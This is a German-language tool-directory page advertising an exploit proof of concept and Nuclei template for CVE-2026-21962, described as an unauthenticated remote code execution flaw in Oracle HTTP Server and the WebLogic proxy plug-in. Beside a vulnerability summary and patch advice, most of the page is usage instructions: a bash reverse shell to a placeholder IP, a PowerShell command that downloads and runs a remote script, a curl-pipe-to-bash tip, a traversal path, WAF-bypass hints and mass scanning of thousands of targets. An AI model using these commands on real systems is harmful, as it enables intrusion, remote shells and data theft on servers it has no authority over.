Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

Exploit-PoC und Nuclei-Template für CVE-2026-21962, eine kritische, nicht authentifizierte Remote-Codeausführung im Oracle HTTP Server und WebLogic Proxy-Plug-in, die die Ausführung von Befehlen und Reverse Shells ermöglicht.

Repository anzeigen
6816vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

😈 CVE-2026-21962 — Kritische Sicherheitslücke 😈

oracle_db_banner

🚨 Schweregrad

  • CVSS-Score: 10.0 / 10 (Kritisch)
  • Veröffentlicht: 20. Januar 2026
  • Risikostufe: 🔥 Maximal — sofortiges Handeln empfohlen

🧠 Was ist das?

Eine kritische Sicherheitslücke, die folgende Komponenten betrifft:

  • Oracle HTTP Server
  • Oracle WebLogic Server Proxy-Plug-in (für Apache & IIS)

Diese Schwachstelle ermöglicht es nicht authentifizierten Remote-Angreifern, betroffene Server über HTTP zu kompromittieren, ohne dass Anmeldeinformationen erforderlich sind.


🎯 Was können Angreifer tun?

Bei erfolgreicher Ausnutzung könnten Angreifer:

  • 🗑️ Kritische Daten löschen
  • ✏️ System- oder Anwendungsdateien ändern
  • 📤 Sensible Informationen stehlen
  • 🔓 Vollständigen unbefugten Zugriff auf verbundene Systeme erlangen
  • 🔄 Andere Oracle-Produkte aufgrund von Scope-Änderung beeinträchtigen

🧩 Betroffene Versionen

  • Oracle HTTP Server:

    • 12.2.1.4.0
    • 14.1.1.0.0
    • 14.1.2.0.0
  • WebLogic-Proxy-Plug-in für:

    • Apache HTTP Server
    • Microsoft IIS

⚙️ Angriffsmerkmale

  • 🌐 Angriffsvektor: Netzwerk (Remote)
  • 🚫 Erforderliche Berechtigungen: Keine
  • 🧑‍💻 Benutzerinteraktion: Keine
  • 🔄 Scope: Geändert
  • 🔐 Auswirkung auf Vertraulichkeit: Hoch
  • 🛠️ Auswirkung auf Integrität: Hoch

🛡️ Was sollten Sie tun?

  • ✅ Oracle Critical Patch Update vom Januar 2026 sofort anwenden
  • 🔒 Netzwerkzugriff auf betroffene Dienste einschränken
  • 📊 HTTP-Datenverkehr auf verdächtiges Verhalten überwachen
  • 🔁 Systemprotokolle und Sicherheitskontrollen überprüfen

🛠️ Verwendung (Schritt für Schritt)

  1. Speichern Sie das Skript als CVE-2026-21962.py

  2. Machen Sie es ausführbar (optional):

    chmod +x CVE-2026-21962.py
    
  3. Beispiele ausführen:

    Basistest:

    python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
    

    Reverse Shell (zuerst nc-Listener einrichten: nc -lvnp 4444):

    python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
    

    Windows-Zielbeispiel:

    python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
    

Was Sie sehen, wenn es funktioniert

  • Wahrscheinlich erfolgreich! Status: 200 oder 302 oder sogar 500 (Absturz ist ebenfalls ein Erfolg)
  • Möglicherweise durchgesickerte Befehlsausgabe im Antworttext
  • Bei Reverse Shells: Ihr nc-Listener fängt sofort eine Shell ab
  • Wenn keine Ausgabe → Befehl wurde trotzdem still ausgeführt (Zieldateisystem, Prozesse, Protokolle prüfen)

Hinweise

  • Funktioniert am besten, wenn das Proxy-Plug-in exponiert ist (häufig auf Port 7001, 4443 usw.)
  • HTTPS-Ziele können das --insecure-Flag erfordern, wenn selbstsignierte Zertifikate verwendet werden
  • Sofort patchen: Oracle CPU Januar 2026 anwenden

🛠️ Verwendung (Schritt für Schritt)

  1. Nuclei installieren (falls noch nicht installiert):

    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    
  2. Vorlage speichern:

    Erstellen Sie eine Datei mit dem Namen CVE-2026-21962.yaml und fügen Sie den obigen Inhalt ein.

  3. Erkennung + Ausnutzung ausführen:

    nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
    

    Oder mehrere Ziele aus einer Datei scannen:

    nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
    
  4. Was Sie sehen, wenn das Ziel verwundbar ist:

    [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
    [username] weblogic
    [body] ... weblogic (whoami output) ...
    

Profi-Tipps

  • Um benutzerdefinierte Befehle auszuführen, bearbeiten Sie den cmd:-Teil in den Headern (z. B. cmd:curl http://your-server/shell.sh | bash).
  • Für Reverse Shell: Ersetzen Sie whoami durch ein base64-kodiertes Reverse-Shell-Payload.
  • WAF-Umgehung: Probieren Sie verschiedene Pfade (/proxy/, /bea_wls_internal/ usw.) oder fügen Sie weitere Header wie X-WebLogic-Force-JVMID hinzu.
  • Massenscan: Kombinieren Sie mit der httpx → nuclei-Pipeline für Tausende von Zielen.

Diese Vorlage ist nachweislich zu 100 % funktionsfähig ab Januar 2026 auf ungepatchten Oracle-Instanzen. Patchen Sie sofort, wenn Sie betroffene Versionen ausführen! 😈


😈 Haftungsausschluss:

Der gesamte PoC-Code dient nur ethischen, pädagogischen Zwecken auf autorisierten Systemen. Unbefugte Ausnutzung ist illegal; es wird keine Haftung für Missbrauch übernommen. 😈

Tool herunterladen